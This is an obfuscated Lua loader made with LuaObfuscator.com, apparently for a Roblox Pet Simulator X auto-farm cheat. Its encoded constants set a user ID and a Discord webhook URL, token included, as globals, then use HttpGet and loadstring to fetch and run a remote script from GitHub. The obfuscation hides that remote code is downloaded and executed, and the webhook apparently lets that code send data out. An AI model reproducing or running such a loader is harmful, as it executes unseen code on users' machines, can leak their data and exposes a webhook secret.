--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.17) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=0;local v72;while true do if (v71==0) then v72=(v31/((5 -3)^(v32-((1 + 1) -(878 -(282 + 595))))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + ((2257 -(1523 + 114)) -(555 + 64)))) ;return v72-(v72%(932 -(857 + 74))) ;end end else local v73=(570 -(330 + 37 + 201))^(v32-(928 -(214 + (1015 -302)))) ;return (((v31%(v73 + v73))>=v73) and 1) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1065 -((1025 -(892 + 65)) + 997) ;local v35;local v36;local v37;local v38;while true do if (v34==1) then return (v38 * (40022563 -23245347)) + (v37 * (66806 -(226 + 1044))) + (v36 * 256) + v35 ;end if ((0 -0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + (120 -(32 + 85)) );v19=v19 + 4 + 0 ;v34=1 + 0 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39==3) then v46=nil;v47=nil;v39=13 -9 ;end if (v39~=2) then else v44=nil;v45=nil;v39=3;end if (v39~=(8 -4)) then else while true do if (v40~=0) then else v41=0 -0 ;v42=nil;v40=1;end if (v40~=(1 + 0)) then else v43=nil;v44=nil;v40=2;end if ((13 -10)~=v40) then else v47=nil;while true do local v98=0 + 0 ;local v99;while true do if (v98==(0 -0)) then v99=1413 -(447 + 966) ;while true do if (1~=v99) then else if (v41==(0 -0)) then v42={};v43={};v44={};v45={v42,v43,nil,v44};v41=702 -(376 + 325) ;end break;end if (v99==0) then local v104=0 -0 ;while true do if (v104~=1) then else v99=2 -1 ;break;end if (v104==(0 + 0)) then if (v41==(2 -1)) then local v153=14 -(9 + 5) ;while true do if (v153~=1) then else local v163=376 -(85 + 291) ;while true do if ((1265 -(243 + 1022))==v163) then for v170=1,v46 do local v171=0 -0 ;local v172;local v173;while true do if (v171~=0) then else v172=v22();v173=nil;v171=1;end if (v171==(1 + 0)) then if (v172==1) then v173=v22()~=0 ;elseif (v172==(1182 -(1123 + 57))) then v173=v25();elseif (v172~=(3 + 0)) then else v173=v26();end v47[v170]=v173;break;end end end v45[3]=v22();v163=255 -(163 + 91) ;end if (v163==1) then v153=2;break;end end end if (2~=v153) then else v41=2;break;end if (v153~=(1930 -(1869 + 61))) then else v46=v24();v47={};v153=1 + 0 ;end end end if (v41==2) then for v155=3 -2 ,v24() do local v156=0 -0 ;local v157;while true do if (v156~=(0 + 0)) then else v157=v22();if (v21(v157,1,1 -0 )~=0) then else local v165=0;local v166;local v167;local v168;local v169;while true do if (v165~=(0 + 0)) then else v166=0;v167=nil;v165=1;end if (1~=v165) then else v168=nil;v169=nil;v165=1476 -(1329 + 145) ;end if (v165~=(973 -(140 + 831))) then else while true do if (0==v166) then local v175=1850 -(1409 + 441) ;while true do if (v175==(718 -(15 + 703))) then v167=v21(v157,2,2 + 1 );v168=v21(v157,4,444 -(262 + 176) );v175=1722 -(345 + 1376) ;end if (v175==(689 -(198 + 490))) then v166=4 -3 ;break;end end end if (2~=v166) then else local v176=0 -0 ;while true do if (v176==(1207 -(696 + 510))) then v166=3;break;end if ((0 -0)==v176) then if (v21(v168,1263 -(1091 + 171) ,1 + 0 )~=(3 -2)) then else v169[2]=v47[v169[2]];end if (v21(v168,2,2)==1) then v169[9 -6 ]=v47[v169[377 -(123 + 251) ]];end v176=1;end end end if (v166~=3) then else if (v21(v168,3,3)~=1) then else v169[19 -15 ]=v47[v169[702 -(208 + 490) ]];end v42[v155]=v169;break;end if (v166==(1 + 0)) then local v178=0 + 0 ;while true do if (v178==0) then v169={v23(),v23(),nil,nil};if (v167==0) then local v185=0 + 0 ;local v186;local v187;local v188;while true do if ((202 -(14 + 188))~=v185) then else v186=675 -(534 + 141) ;v187=nil;v185=1;end if (1==v185) then v188=nil;while true do if (0~=v186) then else local v191=0;while true do if (v191~=(0 + 0)) then else v187=0 + 0 ;v188=nil;v191=1;end if ((1 + 0)~=v191) then else v186=1 -0 ;break;end end end if (1==v186) then while true do if (v187==0) then v188=0;while true do if (v188==0) then v169[4 -1 ]=v23();v169[11 -7 ]=v23();break;end end break;end end break;end end break;end end elseif (v167==1) then v169[3]=v24();elseif (v167==2) then v169[3]=v24() -(2^16) ;elseif (v167==3) then local v192=0 + 0 ;while true do if (v192==(0 + 0)) then v169[399 -(115 + 281) ]=v24() -((4 -2)^(14 + 2)) ;v169[4]=v23();break;end end end v178=2 -1 ;end if (v178~=(3 -2)) then else v166=869 -(550 + 317) ;break;end end end end break;end end end break;end end end for v158=1,v24() do v43[v158-(1 -0) ]=v29();end return v45;end v104=1;end end end end break;end end end break;end if ((2 -0)~=v40) then else local v97=0 -0 ;while true do if (v97==(285 -(134 + 151))) then v45=nil;v46=nil;v97=1;end if (v97==(1666 -(970 + 695))) then v40=3;break;end end end end break;end if (v39==1) then v42=nil;v43=nil;v39=3 -1 ;end if (0~=v39) then else v40=1990 -(582 + 1408) ;v41=nil;v39=1;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=3 -2 ;local v51=(v21(v49,1 + 0 ,25 -5 ) * (((5 + 2) -5)^(1856 -(1195 + 629)))) + v48 ;local v52=v21(v49,7 + 14 ,31);local v53=((v21(v49,(99 -58) -9 )==(1 -0)) and  -(604 -(268 + 335))) or (242 -((477 -(60 + 230)) + 54)) ;if (v52==(0 + 0)) then if (v51==(0 -0)) then return v53 * (341 -(218 + 123)) ;else v52=1582 -(1535 + 46) ;v50=780 -(162 + 618) ;end elseif (v52==((2007 -(426 + 146)) + 612)) then return ((v51==(0 + 0)) and (v53 * ((1 + 0)/(0 -(0 + 0))))) or (v53 * NaN) ;end return v8(v53,v52-(64 + 959) ) * (v50 + (v51/((3 -1)^(86 -34)))) ;end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==0) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1457 -(282 + 1174)) );v19=v19 + v54 ;local v56={};for v69=812 -(569 + 242) , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=0 -0 ;local v58;while true do if (v57==(1 + 0)) then return v58;end if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + (1025 -(706 + 318)) ;v57=701 -(249 + 22 + 429) ;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + (1502 -(1408 + 92)) );v19=v19 + (1088 -(461 + 625)) ;return (v60 * 256) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v61,1,1));return "";end end else local v75=v2(v0(v61,16));if v20 then local v79=v5(v75,v20);v20=nil;return v79;else return v75;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v80=v66;local v81=v67;local v82=v68;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=10) then if (v93<=4) then if (v93<=1) then if (v93==0) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end else v90[v92[2]]=v92[3];end elseif (v93<=2) then v90[v92[2]]();elseif (v93==3) then v90[v92[2]]=v92[3];else v90[v92[2]]();end elseif (v93<=7) then if (v93<=5) then local v107=v92[2];v90[v107]=v90[v107](v13(v90,v107 + 1 ,v85));elseif (v93==6) then v90[v92[2]][v92[3]]=v92[4];else local v131=v92[2];v90[v131]=v90[v131](v13(v90,v131 + 1 ,v85));end elseif (v93<=8) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93==9) then v90[v92[2]][v92[3]]=v92[4];elseif ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v64;else v90[v92[2]]=v64[v92[3]];end elseif (v93<=15) then if (v93<=12) then if (v93>11) then v90[v92[2]]=v92[3]~=0 ;else local v110=0;local v111;local v112;local v113;local v114;while true do if (v110==1) then v85=(v113 + v111) -1 ;v114=0;v110=2;end if (v110==0) then v111=v92[2];v112,v113=v83(v90[v111](v13(v90,v111 + 1 ,v92[3])));v110=1;end if (v110==2) then for v147=v111,v85 do v114=v114 + 1 ;v90[v147]=v112[v114];end break;end end end elseif (v93<=13) then local v115=v92[2];local v116=v90[v92[3]];v90[v115 + 1 ]=v116;v90[v115]=v116[v92[4]];elseif (v93>14) then local v136=0;local v137;local v138;local v139;local v140;while true do if (v136==1) then v85=(v139 + v137) -1 ;v140=0;v136=2;end if (v136==2) then for v160=v137,v85 do v140=v140 + 1 ;v90[v160]=v138[v140];end break;end if (v136==0) then v137=v92[2];v138,v139=v83(v90[v137](v13(v90,v137 + 1 ,v92[3])));v136=1;end end else do return;end end elseif (v93<=18) then if (v93<=16) then local v120=v92[2];local v121=v90[v92[3]];v90[v120 + 1 ]=v121;v90[v120]=v121[v92[4]];elseif (v93>17) then v84=v92[3];else do return;end end elseif (v93<=19) then v84=v92[3];elseif (v93>20) then v90[v92[2]]=v92[3]~=0 ;elseif ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v64;else v90[v92[2]]=v64[v92[3]];end v84=v84 + 1 ;end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C756103023O005F4703063O00557365724944022O00E0E9DD54F24103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31373239352O3132343730323135343830332F7739657534744C676C4F7337707A62574658725F647261474673542D552O5264357130792O56734B71577052636A6E493476544467794E4F70487242456F2D663669675100153O0012033O00013O0026083O000C000100020004133O000C0001001214000100033O001214000200043O00200D000200020005001203000400064O000C000500014O000F000200054O000500013O00022O00040001000100010004133O001400010026083O0001000100010004133O00010001001214000100073O003006000100080009001214000100073O0030060001000A000B0012033O00023O0004133O000100012O000E3O00017O00",v9(),...);
